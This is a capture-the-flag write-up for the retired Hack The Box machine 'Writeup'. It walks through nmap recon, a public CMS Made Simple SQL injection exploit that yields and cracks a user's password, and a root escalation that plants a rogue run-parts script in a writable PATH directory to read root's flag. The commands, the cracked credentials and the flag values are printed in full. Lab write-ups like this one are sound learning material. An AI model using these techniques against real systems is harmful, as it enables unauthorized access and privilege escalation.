Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Writeup by jkr (10.10.10.138)

Tools used

Recon

Nmap

As usual, we kick off with a Nmap scan.

$ nmap -v -p- -oN scanning/nmap_allports -T4 --append-output 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.028s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Having a look at port 80

Since port 80 is open, we’ll have a look at the website.

Homepage of Writeup website

From the homepage we learn that the server is running some DoS protection (Donkey DoS protection). So we’ll probably have to limit the speed of certain automated tools to prevent us from getting banned/blocked.

If you use a tool like Burp or are used to doing some initial recon on web applications, you will probably have noticed there’s a robots.txt file present on this website. The robots.txt file often give web admins a false sense of security as they’ll add sensitive URLs in here because they don’t want (good) bots from visiting them.

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/

Since we aren’t bots, we don’t adhere to the limits of robots.txt and have a look at /writeup/.

/writeup/ at Writeup host

While the homepage was hand-crafted with vi, this page apparently isn’t (see the footer).

CMS Made Simple.
You could’ve also discovered this looking at the HTML head:

<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.">

Exploiting

Let’s have a look at Exploit-db and let’s look for exploits that don’t require to be authenticated (since we don’t have any credentials yet).
CMS Made Simple < 2.2.10 - SQL Injection” looks promising.

You’ll have to update the value of the TIME variable in the script, or the Donkey DoS protection will ban your IP. Changing this value to 5 sufficed in my case.

I ran the script without cracking and copied the cracking code to do the cracking independently because I didn’t have a wordlist ready. However, you can easily do the cracking immediatly by passing the --crack and -w parameters.
Don’t forget to pass the full URL to the CMS Made Simple application.

$ python exploit.py -u http://10.10.10.138/writeup/ --crack -w /usr/share/wordlists/rockyou.txt
 [+] Salt for password found: 5a599ef579066807
 [+] Username found: jkr
 [+] Email found: jkr@writeup.htb
 [+] Password found: 62def4866937f08cc13bab43bb14e6f7
 [+] Password cracked: raykayjay9

$ Getting the user flag

SSH onto the box with these credentials and get the user flag.

$ ssh jkr@10.10.10.138
jkr@writeup:~$ cat user.txt 
 d4e493fd4068afc9eb1aa6a55319f978

Going for root

I have to admit I peeked at the HTB forum for this part. And it appears many people have had to.
The reason for this is that you need to get some traffic onto the machine to be able to get a hint towards getting root.

Mind your $PATH

Upload and launch pspy64 onto the machine and have a look at the processes and their parameters.

Can you spot what’s dangerous in this command?

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

You may notice that this command passes a custom $PATH and then calls another command (run-parts) without specifying a direct path to the script, thus relying on finding the command in the $PATH. It then stores the output of this command in the MotD (Message of the Day).

You can go thorugh each of the directories in this $PATH or run Linux Smart Enumeration (lse) to find a directory within the path in which we have write permissions.

jkr@writeup:~$ bash lse.sh -l 2 -s fst000
---
If you know the current user password, write it here for better results: raykayjay9
---

        User: jkr
     User ID: 1000
    Password: ******
        Home: /home/jkr
        Path: /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
       umask: 0022

    Hostname: writeup
       Linux: 4.9.0-8-amd64
Distribution: Devuan GNU/Linux ascii
Architecture: x86_64

============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
---
/var/local
/var/lib/php/sessions
/var/tmp
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
/home/jkr
/tmp
/tmp/.sw
/tmp/.sw/sw.sh
/tmp/.sw/sw2.sh
---

==================================( FINISHED )==================================

# Getting the root flag

Since /usr/local/sbin is writeable, we can add a script run-parts in which we output the content of the root flag file. This output will be added to the MotD which will be printed in the hello message of any user SSHing onto the box. Make sure the script is executable. Logout from the host and re-login or login from another terminal (tab).

jkr@writeup:~$ nano /usr/local/sbin/run-parts
#!/bin/bash
ls /root/
cat /root/root.txt

jkr@writeup:~$ chmod +x /usr/local/sbin/run-parts

$ ssh jkr@10.10.10.138
jkr@10.10.10.138's password: 
bin
root.txt
eeba47f60b48ef92b734f9b6198d7226

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

You could ofcourse also print the content of the root.txt file into a file on /tmp/. However, make sure you delete the file as soon as you copied the flag so you don’t spoil it for the others. The file will be created by root, so you’ll need to reuse the ‘exploit’ to delete the file.

The only way of discovering the limits of the possible is to venture a little way past them into the impossible.

~ Arthur C. Clarke